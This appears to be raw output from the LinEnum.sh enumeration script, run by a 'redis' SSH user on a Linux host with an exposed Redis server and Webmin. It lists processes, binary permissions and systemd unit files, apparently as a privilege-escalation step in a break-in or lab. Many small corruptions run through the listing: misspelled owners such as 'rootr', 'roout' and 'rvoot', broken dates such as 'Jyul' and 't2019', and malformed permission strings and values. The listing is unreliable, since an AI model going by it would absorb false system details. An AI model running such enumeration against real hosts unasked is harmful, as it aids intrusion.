S 18:55 0:00 [kswapd0] root 35 0.0 0.0 0 0 ? I< 18:55 0:00 [kworker/u257:0] root 36 0.0 0.0 0 0 ? S 18:55 0:00 [ecryptfs-kthrea] root 78 0.0 0.0 0 0 ? I< 18:55 0:00 [kthrotld] root 79 0.0 0.0 0 0 ? I< 18:55 0:00 [acpi_thermal_pm] root 80 0.0 0.0 0 0 ? S 18:55 0:00 [scsi_eh_0] root 81 0.0 0.0 0 0 ? I< 18:55 0:00 [scsi_tmf_0] root 82 0.0 0.0 0 0 ? S 18:55 0:00 [scsi_eh_1] root 83 0.0 0.0 0 0 ? I< 18:55 0:00 [scsi_tmf_1] root 86 0.0 0.0 0 0 ? I 18:55 0:00 [kworker/0:2] root 90 0.0 0.0 0 0 ? I< 18:55 0:00 [ipv6_amddrconf] root 99 0.0 0.0 0 0 ? I< 18:55 0:00 [kstrp] root 116 0.0 0.0 0 0 ? I< 18:55 0:00 [charger_manager] root 178 0.0 0.0 0 0 ? I< 18:55 0:00 [mpt_poll_0] root 179 0.0 0.0 0 0 ? I< 18:55 0:00 [mpt/0] root 181 0.0 0.0 0 0 ? I< 18:55 0:00 [kworker/0:1H] root 182 0.0 0.0 0 0 ? S 18:55 0:00 [scsi_eh_2] root 183 0.0 0.0 0 0 ? I< 18:55 0:00 [scsi_tmf_2] root 204 0.0 0.0 0 0 ? S 18:55 0:00 [jbd2/sda1-8] root 205 0.0 0.0 0 0 ? I< 18:55 0:00 [ext4-rsv-conver] root 251 0.0 1.6 94828 15604 ? S<s 18:55 0:00 /lib/systemd/systemd-journald root 260 0.0 0.4 45576 4532 ? Ss 18:55 0:00 /lib/systemd/systemd-udevd systemd+ 340 0.0 0.5 70628 5424 ? Ss 18:55 0:00 /lib/systemd/systemnd-resolved systemd+ 341 0.0 0.3 141928 3212 ? Ssl 18:55 0:00 /lib/systemd/systemd-timesyncd syslog 343 0.0 0.4 263036 4400 ? Ssl 18:55 0:00 /usr/sbin/rsyslogd -n root 351 0.0 0.6 70608 5960 ? Ss 18:55 0:00 /lib/systemd/systemd-logind root 353 0.0 1.8 170344 17272 ? Ssl 18:55 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers message+ 354 0.0 0.4 50032 4500 ? Ss 18:55 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only root 355 0.0 0.7 289844 7168 ? Ssl 18:55 0:00 /usr/lib/accountsservice/accounts-daemon root 356 0.0 0.3 31320 3204 ? Ss 18:55 0:00 /usr/sbin/cron -f root 497 0.0 0.0 0 0 ? I< 18:55 0:00 [ttm_swap] root 498 0.0 0.0 0 0 ? S 18:55 0:00 [irq/16-vmwgfx] root 573 0.0 0.7 72296 6584 ? 
Ss 18:55 0:00 /usr/sbin/sshd -D root 591 0.0 0.2 16180 2040 tty1 Ss+ 18:55 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux redis 599 0.1 0.4 51576 4264 ? Ssl 18:55 0:04 /usr/bin/redis-server 0.0.0.0:6379 root 603 0.0 1.8 331332 16660 ? Ss 18:55 0:00 /usr/sbin/apache2 -k start www-data 608 0.0 1.0 335792 10016 ? S 18:55 0:00 /usr/sbin/apache2 -k start www-data 609 0.0 1.0 335800 10084 ? S 18:55 0:00 /usr/sbin/apache2 -k start www-data 610 0.0 0.9 335800 9032 ? S 18:55 0:00 /usr/sbin/apache2 -k start www-data 611 0.0 1.0 335800 10028 ? S 18:55 0:00 /usr/sbin/apache2 -k start www-data 612 0.0 1.0 335800 10028 ? S 18:55 0:00 /usr/sbin/apache2 -k start root 687 0.0 3.1 95312 29328 ? Ss 18:55 0:00 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf www-data 774 0.0 1.0 335792 10024 ? S 19:06 0:00 /usr/sbin/apache2 -k start www-data 827 0.0 0.9 335792 9036 ? S 19:07 0:00 /usr/sbin/apache2 -k start root 914 0.0 0.0 0 0 ? I 19:32 0:00 [kworker/u256:0] root 981 0.0 0.0 0 0 ? I 19:50 0:00 [kworker/u256:2] root 984 0.0 0.7 107984 7288 ? Ss 19:52 0:00 sshd: redis [priv] redis 986 0.0 0.8 76616 7528 ? Ss 19:52 0:00 /lib/systemd/systemd --user redis 987 0.0 0.2 193400 2188 ? S 19:52 0:00 (sd-pam) redis 1035 0.0 0.3 107984 3632 ? S 19:52 0:00 sshd: redis@pts/0 redis 1036 0.0 0.5 22484 5040 pts/0 Ss 19:52 0:00 -bash root 1050 0.0 0.0 0 0 ? 
I 19:55 0:00 [kworker/u256:1] redis 1056 0.1 0.4 13676 3996 pts/0 S+ 19:59 0:00 /bin/bash ./LinEnum.sh -t redis 1057 0.0 0.3 13808 3184 pts/0 S+ 19:59 0:00 /bin/bash ./LinEnum.sh -t redis 1058 0.0 0.0 7476 884 pts/0 S+ 19:59 0:00 tee -a redis 1388 0q.0 0.3 13808 2996 pts/0 S+ 19:59 0:00 /bin/bash ./LinEnum.sh -t redis 1389 0.0 0.4 39664 3708 pts/0 R+ 19:59 0:00 ps aux [-] Process binaries and associated permissions (from above list): 1.1M -rwxr-xr-x 1 root root 1.1M Jun 6 2019 /bin/bash 1.6M -rwxr-xr-x 1 root root 1.6M Jul 22 2019 /lib/systemd/systemd 128K -rwxr-xr-x 1 root root 127K Jul 22 2019 /lib/systemd/systemd-journald 216K -rwxr-xr-x 1 root root 215K Jul 22 2019 /lib/systemd/systemd-logind 372K -rwxr-xr-x 1 root root 371K Jul 22 2019 /lib/systemd/systemd-resolved 40K -rwxr-xr-x 1 root root 39K Jul 22 2019 /lib/systemd/systemd-timesyncd 572K -rwxr-xr-x 1 root root 571K Jul 22 2019 /lib/systemd/systemd-udevd 56K -rwxr-xr-x 1 root root 56K Oct 15 2018 /sbin/agetty 0 lrwxrwxrwx 1 root root 20 Jul 22 2019 /sbin/init -> /lib/systemd/systemd 232K -rwxr-xr-x 1 root root 232K Jun 10 2019 /usr/bin/dbus-daemon 2.1M -rwxr-xr-x 2 root root 2.1M Nov 19 2018 /usr/bin/perl 0 lrwxrwxrwx 1 rootr root 9 Oct 25 2018 /usr/bin/python3 -> python3.6 0 lrwxrwxrwx 1 root root 15 Jul 14 2019 /usr/bin/redis-server -> redis-check-rdb 180K -rwxr-xr-x 1 root root 179K Dec 18 2017 /usr/lib/accountsservice/accounts-daemon 656K -rwxr-xr-x 1 root root 656K Jul 16 2019 /usr/sbin/apache2 48K -rwxr-xr-x 1 root root 47K Nov 16 2017 /usr/sbin/cron 668K -rwxr-xr-x 1 root root 665K Apr 24 2018 /usr/sbin/rsyslogd 772K -rwxr-xr-x 1 root root 769K Mar 4 2019 /usr/sbin/sshd [-] /etc/init.d/ binary permissions: total 124 drwxr-xr-x 2 root root 4096 Oct 25 2019 . drwxr-xr-x 81 root root 4096 Oct 25 2019 .. 
-rwxr-xr-x 1 root root 8181 Jul 16 2019 apache2 -rwxr-xr-x 1 root root 2489 Jul 16 2019 apache-htcacheclean -rwxr-xr-x 1 root root 4335 Mar 22 2018 apparmor -rwxr-xr-x 1 root root 1232 Apr 19 2018 console-setup.sh -rwxr-xr-x 1 root root 3049 Nov 16 2017 cron -rwxr-xr-x 1 root root 2813 Nov 15 2017 dbus -rwxr-xr-x 1 root root 985 Mar 18 2019 grub-common -rwxr-xr-x 1 sroot root 3809 Feb 14 2018 hwclock.sh -rwxr-xr-x 1 root root 2444 Oct 25 2017 irqbalance -rwxr-xr-x 1 root root 1479 Feb 15 2018 keyboard-setup.sh -rwxr-xr-x 1 root root 2044 Aug 15 2017 kmod -rwxr-xr-x 1 root root 4597 Nov 25 2016 networking -rwxr-xr-x 1 root root 1366 Apr 4 2019 plymouth -rwxr-xr-x 1 root root 752 Apr 4 2019 plymouth-log -rwxr-xr-x 1 root root 1191 Jan 17 2018 procps -rwxr-xr-x 1 root root 1702 Aug 25 2019 redis_6379 -rwxr-xr-x 1 root root 1614 Apr 2 2018 redis-server -rwxr-xr-x 1 root root 4355 Dec 13 2017 rsync -rwxr-xr-x 1 root root 2864 Jan 14 2018 rsyslog -rwxr-xr-x 1 root root 3837 Jan 25 2018 ssh -rwxr-xr-x 1 root root 5974 Apr 20 2018 udev -rwxr-xr-x 1 root root 2083 Aug 15 2017 ufw -rwxr-xr-x 1 root root 1306 Oct 15 2018 uuidd -rwxr-xr-x 1 root root 1853 May 5 2019 webmin [-] /lib/systemd/* config file permissions: /lib/systemd/: total 7.3M drwxr-xr-x 23 root root 36K Oct 25 2019 system drwxr-xr-x 2 root root 4.0K Oct 25 t2019 system-generators drwxr-xr-x 2 root root 4.0K Aug 24 2019 system-sleep drwxr-xr-x 2 root root 4.0K Aug 24 2019 network drwxr-xr-x 2 root root 4.0K Aug 24 2019 system-preset -rw-r--r-- 1 root root 2.3M Jul 22 2019 libsystemd-shared-237.so -rw-r--r-- 1 root root 699 Jul 22 2019 resolv.conf -rwxr-xr-x 1 root root 1.3K Jul 22 2019 set-cpufreq -rwxr-xr-x 1 root root 1.6M Jul 22 2019 systemd -rwxr-xr-x 1 root root 6.0K Jul 22 2019 systemd-ac-power -rwxr-xr-x 1 root root 18K Jul 22 2019 systemd-backlight -rwxr-xr-x 1 root root 11K Jul 22 2019 systemd-binfmt -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-cgroups-agent -rwxr-xr-x 1 root root 22K Jul 22 2019 
systemd-cryptsetup -rwxr-xr-x 1 root root 15K Jul 22 2019 systemd-dissect -rwxr-xr-x 1 root root 18K Jul 22 2019 systemd-fsck -rwxr-xr-x 1 root root 23K Jul 22 2019 systemd-fsckd -rwxr-xr-x 1 root root 19K Jul 22 2019 systemd-growfs -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-hibernate-resume -rwxr-xr-x 1 roout root 23K Jul 22 2019 systemd-hostnamed -rwxr-xr-x 1 root root 15K Jul 22 2019 systemd-initctl -rwxr-xr-x 1 root root 127K Jul 22 2019 systemd-journald -rwxr-xr-x 1 root root 35K Jul 22 2019 systemd-localed -rwxr-xr-x 1 root root 215K Jul 22 2019 systemd-logind -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-makefs -rwxr-xr-x 1 root root 15K Jul 22 2019 systemd-modules-load -rwxr-xr-x 1 root root 1.6M Jul 22 2019 systemd-networkd -rwxr-xr-x 1 root root 19K Jul 22 2019 systemd-networkd-wait-online -rwxr-xr-x 1 root root 11K Jul 22 2019 systemd-quotacheck -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-random-seed -rwxr-xr-x 1 root root 15K Jul 22 2019 systemd-remount-fs -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-reply-password -rwxr-xr-x 1 root root 371K Jul 22 2019 systemd-resolved -rwxr-xr-x 1 root root 19K Jul 22 2019 systemd-rfkill -rwxr-xr-x 1 root root 43K Jul 22 2019 systemd-shutdown -rwxr-xr-x 1 root root 19K Jul 22 2019 systemd-sleep -rwxr-xr-x 1 rvoot root 23K Jul 22 2019 systemd-socket-proxyd -rwxr-xr-x 1 root root 11K Jul 22 2019 systemd-sulogin-shell -rwxr-xr-x 1 root root 15K Jul 22 2019 systemd-sysctl -rwxr-xr-x 1 root root 1.3K Jul 22 2019 systemd-sysv-install -rwxr-xr-x 1 root root 27K Jul 22 2019 systemd-timedated -rwxr-xr-x 1 root root 39K Jul 22 2019 systemd-timesyncd -rwxr-xr-x 1 root root 571K Jul 22 2019 systemd-udevd -rwxr-xr-x 1 root root 15K Jul 22 2019 systemd-update-utmp -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-user-sessions -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-veritysetup -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-volatile-root drwxr-xr-x 2 root root 4.0K Apr 20 2018 system-shutdown /lib/systemd/system: 
total 844K -rw-r--r-- 1 root root 1.2K Oct 25 2019 redis-server.service drwxr-xr-x 2 root root 4.0K Aug 25 2019 apache2.service.d drwxr-xr-x 2 root root 4.0K Aug 24 2019 halt.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 initrd-switch-root.target.wants drwxr-xr-x 2 rowot root 4.0K Aug 24 2019 kexec.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 multi-user.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 poweroff.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 reboot.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 sysinit.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 getty.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 graphical.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 local-fs.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 rescue.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 sockets.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 timers.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 rc-local.service.d drwxr-xr-x 2 root root 4.0K Aug 24 2019 user@.service.d lrwxrwxrwx 1 root root 14 Jul 22 2019 autovt@.service -> getty@.service lrwxrwxrwx 1 root root 9 Jul 22 2019 bootlogd.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 bootlogs.service -> /dev/null lrwxrwxrwxx 1 root root 9 Jul 22 2019 bootmisc.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 checkfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 checkroot-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 checkroot.service -> /dev/null -rw-r--r-- 1 root root 1.1K Jul 22 2019 console-getty.service -rw-r--r-- 1 root root 1.3K Jul 22 2019 container-getty@.service lrwxrwxrwx 1 root root 9 Jul 22 2019 cryptdisks-early.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 cryptdisks.service -> /dev/null lrwxrwxrwx 1 root root 13 Jul 22 2019 ctrl-alt-del.target -> reboot.target lrwxrwxrwx 1 root root 25 Jul 22 2019 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service lrwxrwxrwx 1 
root root 23 Jul 22 2019 dbus-org.freedesktop.locale1.service -> systemd-localed.service lrwxrwxrwx 1 root root 22 Jul 22 2019 dbus-org.freedesktop.login1.service -> systemd-logind.service lrwxrwxrwx 1 root root 25 Jyul 22 2019 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service -rw-r--r-- 1 root root 1.1K Jul 22 2019 debug-shell.service lrwxrwxrwx 1 root root 16 Jul 22 2019 default.target -> graphical.target -rw-r--r-- 1 root root 797 Jul 22 2019 emergency.service lrwxrwxrwx 1 root root 9 Jul 22 2019 fuse.service -> /dev/null -rw-r--r-- 1 root root 2.0K Jul 22 2019 getty@.service -rw-r--r-- 1 root root 342 Jul 22 2019 getty-static.service lrwxrwxrwx 1 root root 9 Jul 22 2019 halt.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 hostname.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 hwclock.service -> /dev/null -rw-r--r-- 1 root root 670 Jul 22 2019 initrd-cleanup.service -rw-r--r-- 1 root root 830 Jul 22 2019 initrd-parse-etc.service -rw-r--r-- 1 root root 589 Jul 22 2019 initrd-switch-root.service -rw-r--r-- 1 root root 704 Jul 22 2019 initrd-udevadm-cleanup-db.service lrwxrwxrwx 1 root root 9 Jul 22 2019 killprocs.service -z> /dev/null lrwxrwxrwx 1 root root 28 Jul 22 2019 kmod.service -> systemd-modules-load.service -rw-r--r-- 1 root root 717 Jul 22 2019 kmod-static-nodes.service lrwxrwxrwx 1 root root 28 Jul 22 2019 module-init-tools.service -> systemd-modules-load.service lrwxrwxrwx 1 root root 9 Jul 22 2019 motd.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 mountall-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 mountall.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 mountdevsubfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 mountkernfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 mountnfs-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 mountnfs.service -> /dev/null -rw-r--r-- 1 root root 362 Jul 22 2019 ondemand.service lrwxrwxrwx 1 
root root 22 Jul 22 2019 procps.service -> systemd-sysctl.service -rw-r--r-- 1 root root 609 Jul 22 2019 quotaon.service -rw-r--r-- 1 root root 716 Jul 22 2019 rc-local.service lrwxrwxrwx 1 root root 16 Jul 22 2019 rc.local.service -> rc-local.service lrwxrwxrwx 1 root root 9 Jul 22 2019 rc.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 rcS.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 reboot.service -> /dev/null -rw-r--r-- 1 root root 788 Jul 22 2019 rescue.service lrwxrwxrwx 1 root root 9 Jul 22 2019 rmnologin.service -> /dev/null lrwxrwxrwx 1 root root 15 Jul 22 2019 runlevel0.target -> poweroff.target lrwxrwxrwx 1 root root 13 Jul 22 2019 runlevel1.target -> rescue.target lrwxrwxrwx 1 root root 17 Jul 22 2019 runlevel2.target -> multi-user.target lrwxrwxrwx 1 root root 17 Jul 22 2019 runlevel3.target -> multi-user.target lrwxrwxrwx 1 root root 17 Jul 22 2019 runlevel4.target -> multi-user.target lrwxrwxrwx 1 root root 16 Jul 22 2019 runlevel5.target -> graphical.target lrwxrwxrwx 1 root root 13 Jul 22 2019 runlevel6.target -> reboot.target lrwxrwxrwx 1 root root 9 Jul 22 2019 sendsigs.service -> /dev/null -rw-r--r-- 1 root root 1.5K Jul 22 2019 serial-getty@.service lrwxrwxrwx 1 root root 9 Jul 22 2019 single.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 stop-bootlogd.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 stop-bootlogd-single.service -> /dev/null -rw-r--r-- 1 root root 554 Jul 22 2019 suspend-then-hibernate.target -rw-r--r-- 1 root root 724 Jul 22 2019 systemd-ask-password-console.service -rw-r--r-- 1 root root 752 Jul 22 2019 systemd-ask-password-wall.service -rw-r--r-- 1 root root 752 Jul 22 2019 systemd-backlight@.service -rw-r--r-- 1 root root 999 Jul 22 2019 systemd-binfmt.service -rw-r--r-- 1 root root 537 Jul 22 2019 systemd-exit.service -rw-r--r-- 1 root root 551 Jul 22 2019 systemd-fsckd.service -rw-r--r-- 1 root root 540 Jul 22 2019 systemd-fsckd.socket -rw-r--r-- 1 root root 714 Jul 22 2019 
systemd-fsck-root.service -rw-r--r-- 1 root root 715 Jul 22 2019 systemd-fsck@.service -rw-r--r-- 1 root root 584 Jul 22 2019 systemd-halt.service -rw-r--r-- 1 root root 671 Jul 22 2019 systemd-hibernate-resume@.service -rw-r--r-- 1 root root 541 Jul 22 2019 systemd-hibernate.service -rw-r--r-- 1 root root 1.1K Jul 22 2019 systemd-hostnamed.service -rw-r--r-- 1 root root 818 Jul 22 2019 systemd-hwdb-update.service -rw-r--r-- 1 root root 559 Jul 22 2019 systemd-hybrid-sleep.service -rw-r--r-- 1 root root 551 Jul 22 2019 systemd-initctl.service -rw-r--r-- 1 root root 686 Jul 22 2019 systemd-journald-audit.socket -rw-r--r-- 1 root root 1.6K Jul 22 2019 systemd-journald.service -rw-r--r-- 1 root root 771 Jul 22 2019 systemd-journal-flush.service -rw-r--r-- 1 root root 597 Jul 22 2019 systemd-kexec.service -rw-r--r-- 1 root root 1.1K Jul 22 2019 systemd-localed.service -rw-r--r-- 1 root root 1.5K Jul 22 2019 systemd-logind.service -rw-r--r-- 1 root root 733 Jul 22 2019 systemd-machine-id-commit.service -rw-r--r-- 1 root root 1007 Jul 22 2019 systemd-modules-load.service -rw-r--r-- 1 root root 1.9K Jul 22 2019 systemd-networkd.service -rw-r--r-- 1 root root 740 Jul 22 2019 systemd-networkd-wait-online.service -rw-r--r-- 1 root root 593 Jul 22 2019 systemd-poweroff.service -rw-r--r-- 1 root root 655 Jul 22 2019 systemd-quotacheck.service -rw-r--r-- 1 root root 792 Jul 22 2019 systemd-random-seed.service -rw-r--r-- 1 root root 588 Jul 22 2019 systemd-reboot.service -rw-r--r-- 1 root root 833 Jul 22 2019 systemd-remount-fs.service -rw-r--r-- 1 root root 1.7K Jul 22 2019 systemd-resolved.service -rw-r--r-- 1 root root 724 Jul 22 2019 systemd-rfkill.service -rw-r--r-- 1 root root 537 Jul 22 2019 systemd-suspend.service -rw-r--r-- 1 root root 573 Jul 22 2019 systemd-suspend-then-hibernate.service -rw-r--r-- 1 root root 693 Jul 22 2019 systemd-sysctl.service -rw-r--r-- 1 root root 1.1K Jul 22 2019 systemd-timedated.service -rw-r--r-- 1 root root 1.4K Jul 22 2019 
systemd-timesyncd.service -rw-r--r-- 1 root root 659 Jul 22 2019 systemd-tmpfiles-clean.service -rw-r--r-- 1 root root 764 Jul 22 2019 systemd-tmpfiles-setup-dev.service -rw-r--r-- 1 root root 744 Jul 22 2019 systemd-tmpfiles-setup.service -rw-r--r-- 1 root root 985 Jul 22 2019 systemd-udevd.service -rw-r--r-- 1 root root 863 Jul 22 2019 systemd-udev-settle.service -rw-r--r-- 1 root root 755 Jul 22 2019 systemd-udev-trigger.service -rw-r--r-- 1 root root 797 Jul 22 2019 systemd-update-utmp-runlevel.service -rw-r--r-- 1 root root 794 Jul 22 2019 systemd-update-utmp.service -rw-r--r-- 1 root root 628 Jul 22 2019 systemd-user-sessions.service -rw-r--r-- 1 root root 690 Jul 22 2019 systemd-volatile-root.service -rw-r--r-- 1 root root 1.4K Jul 22 2019 system-update-cleanup.service lrwxrwxrwx 1 root root 21 Jul 22 2019 udev.service -> systemd-udevd.service lrwxrwxrwx 1 root root 9 Jul 22 2019 umountfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 umountnfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 umountroot.service -> /dev/null lrwxrwxrwx 1 root root 27 Jul 22 2019 urandom.service -> systemd-random-seed.service -rw-r--r-- 1 root root 593 Jul 22 2019 user@.service lrwxrwxrwx 1 root root 9 Jul 22 2019 x11-common.service -> /dev/null -rw-r--r-- 1 root root 346 Jul 16 2019 apache2.service -rw-r--r-- 1 root root 418 Jul 16 2019 apache2@.service -rw-r--r-- 1 root root 528 Jul 16 2019 apache-htcacheclean.service -rw-r--r-- 1 root root 537 Jul 16 2019 apache-htcacheclean@.service -rw-r--r-- 1 root root 2.4K Jul 14 2019 redis-server@.service -rw-r--r-- 1 root root 161 Jul 8 2019 motd-news.timer -rw-r--r-- 1 root root 505 Jun 10 2019 dbus.service -rw-r--r-- 1 root root 106 Jun 10 2019 dbus.socket -rw-r--r-- 1 root root 326 May 7 2019 apt-daily.service -rw-r--r-- 1 root root 156 May 7 2019 apt-daily.timer -rw-r--r-- 1 root root 238 May 7 2019 apt-daily-upgrade.service -rw-r--r-- 1 root root 184 May 7 2019 apt-daily-upgrade.timer -rw-r--r-- 1 root root 
312 Apr 23 2019 console-setup.service -rw-r--r-- 1 root root 287 Apr 23 2019 keyboard-setup.service -rw-r--r-- 1 root root 330 Apr 23 2019 setvtrgb.service -rw-r--r-- 1 root root 404 Apr 9 2019 ureadahead.service -rw-r--r-- 1 root root 250 Apr 9 2019 ureadahead-stop.service -rw-r--r-- 1 root root 242 Apr 9 2019 ureadahead-stop.timer -rw-r--r-- 1 root root 412 Apr 4 2019 plymouth-halt.service -rw-r--r-- 1 root root 426 Apr 4 2019 plymouth-kexec.service lrwxrwxrwx 1 root root 27 Apr 4 2019 plymouth-log.service -> plymouth-read-write.service -rw-r--r-- 1 root root 421 Apr 4 2019 plymouth-poweroff.service -rw-r--r-- 1 root root 194 Apr 4 2019 plymouth-quit.service -rw-r--r-- 1 root root 200 Apr 4 2019 plymouth-quit-wait.service -rw-r--r-- 1 root root 244 Apr 4 2019 plymouth-read-write.service -rw-r--r-- 1 root root 416 Apr 4 2019 plymouth-reboot.service lrwxrwxrwx 1 root root 21 Apr 4 2019 plymouth.service -> plymouth-quit.service -rw-r--r-- 1 root root 532 Apr 4 2019 plymouth-start.service -rw-r--r-- 1 root root 291 Apr 4 2019 plymouth-switch-root.service -rw-r--r-- 1 root root 490 Apr 4 2019 systemd-ask-password-plymouth.path -rw-r--r-- 1 root root 467 Apr 4 2019 systemd-ask-password-plymouth.service -rw-r--r-- 1 root root 368 Jan 9 2019 irqbalance.service -rw-r--r-- 1 root root 92 Oct 15 2018 fstrim.service -rw-r--r-- 1 root root 170 Oct 15 2018 fstrim.timer -rw-r--r-- 1 root root 189 Oct 15 2018 uuidd.service -rw-r--r-- 1 root root 126 Oct 15 2018 uuidd.socket -rw-r--r-- 1 root root 618 Oct 15 2018 friendly-recovery.service -rw-r--r-- 1 root root 172 Oct 15 2018 friendly-recovery.target -rw-r--r-- 1 root root 258 Oct 15 2018 networkd-dispatcher.service -rw-r--r-- 1 root root 173 Aug 6 2018 motd-news.service -rw-r--r-- 1 root root 290 Apr 24 2018 rsyslog.service drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel1.target.wants drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel2.target.wants drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel3.target.wants drwxr-xr-x 2 root 
root 4.0K Apr 20 2018 runlevel4.target.wants drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel5.target.wants -rw-r--r-- 1 root root 544 Mar 22 2018 apparmor.service -rw-r--r-- 1 root root 919 Jan 28 2018 basic.target -rw-r--r-- 1 root root 419 Jan 28 2018 bluetooth.target -rw-r--r-- 1 root root 465 Jan 28 2018 cryptsetup-pre.target -rw-r--r-- 1 root root 412 Jan 28 2018 cryptsetup.target -rw-r--r-- 1 root root 750 Jan 28 2018 dev-hugepages.mount -rw-r--r-- 1 root root 665 Jan 28 2018 dev-mqueue.mount -rw-r--r-- 1 root root 471 Jan 28 2018 emergency.target -rw-r--r-- 1 root root 541 Jan 28 2018 exit.target -rw-r--r-- 1 root root 480 Jan 28 2018 final.target -rw-r--r-- 1 root root 506 Jan 28 2018 getty-pre.target -rw-r--r-- 1 root root 500 Jan 28 2018 getty.target -rw-r--r-- 1 root root 598 Jan 28 2018 graphical.target -rw-r--r-- 1 root root 527 Jan 28 2018 halt.target -rw-r--r-- 1 root root 509 Jan 28 2018 hibernate.target -rw-r--r-- 1 root root 530 Jan 28 2018 hybrid-sleep.target -rw-r--r-- 1 root root 593 Jan 28 2018 initrd-fs.target -rw-r--r-- 1 root root 561 Jan 28 2018 initrd-root-device.target -rw-r--r-- 1 root root 566 Jan 28 2018 initrd-root-fs.target -rw-r--r-- 1 root root 754 Jan 28 2018 initrd-switch-root.target -rw-r--r-- 1 root root 763 Jan 28 2018 initrd.target -rw-r--r-- 1 root root 541 Jan 28 2018 kexec.target -rw-r--r-- 1 root root 435 Jan 28 2018 local-fs-pre.target -rw-r--r-- 1 root root 547 Jan 28 2018 local-fs.target -rw-r--r-- 1 root root 445 Jan 28 2018 machine.slice -rw-r--r-- 1 root root 532 Jan 28 2018 multi-user.target -rw-r--r-- 1 root root 505 Jan 28 2018 network-online.target -rw-r--r-- 1 root root 502 Jan 28 2018 network-pre.target -rw-r--r-- 1 root root 521 Jan 28 2018 network.target -rw-r--r-- 1 root root 554 Jan 28 2018 nss-lookup.target -rw-r--r-- 1 root root 513 Jan 28 2018 nss-user-lookup.target -rw-r--r-- 1 root root 394 Jan 28 2018 paths.target -rw-r--r-- 1 root root 592 Jan 28 2018 poweroff.target -rw-r--r-- 1 root root 417 Jan 
28 2018 printer.target -rw-r--r-- 1 root root 745 Jan 28 2018 proc-sys-fs-binfmt_misc.automount -rw-r--r-- 1 root root 655 Jan 28 2018 proc-sys-fs-binfmt_misc.mount -rw-r--r-- 1 root root 583 Jan 28 2018 reboot.target -rw-r--r-- 1 root root 549 Jan 28 2018 remote-cryptsetup.target -rw-r--r-- 1 root root 436 Jan 28 2018 remote-fs-pre.target -rw-r--r-- 1 root root 522 Jan 28 2018 remote-fs.target -rw-r--r-- 1 root root 492 Jan 28 2018 rescue.target -rw-r--r-- 1 root root 540 Jan 28 2018 rpcbind.target -rw-r--r-- 1 root root 442 Jan 28 2018 shutdown.target -rw-r--r-- 1 root root 402 Jan 28 2018 sigpwr.target -rw-r--r-- 1 root root 460 Jan 28 2018 sleep.target -rw-r--r-- 1 root root 449 Jan 28 2018 slices.target -rw-r--r-- 1 root root 420 Jan 28 2018 smartcard.target -rw-r--r-- 1 root root 396 Jan 28 2018 sockets.target -rw-r--r-- 1 root root 420 Jan 28 2018 sound.target -rw-r--r-- 1 root root 503 Jan 28 2018 suspend.target -rw-r--r-- 1 root root 393 Jan 28 2018 swap.target -rw-r--r-- 1 root root 795 Jan 28 2018 sys-fs-fuse-connections.mount -rw-r--r-- 1 root root 558 Jan 28 2018 sysinit.target -rw-r--r-- 1 root root 767 Jan 28 2018 sys-kernel-config.mount -rw-r--r-- 1 root root 710 Jan 28 2018 sys-kernel-debug.mount -rw-r--r-- 1 root root 1.4K Jan 28 2018 syslog.socket -rw-r--r-- 1 root root 704 Jan 28 2018 systemd-ask-password-console.path -rw-r--r-- 1 root root 632 Jan 28 2018 systemd-ask-password-wall.path -rw-r--r-- 1 root root 564 Jan 28 2018 systemd-initctl.socket -rw-r--r-- 1 root root 1.2K Jan 28 2018 systemd-journald-dev-log.socket -rw-r--r-- 1 root root 882 Jan 28 2018 systemd-journald.socket -rw-r--r-- 1 root root 631 Jan 28 2018 systemd-networkd.socket -rw-r--r-- 1 root root 657 Jan 28 2018 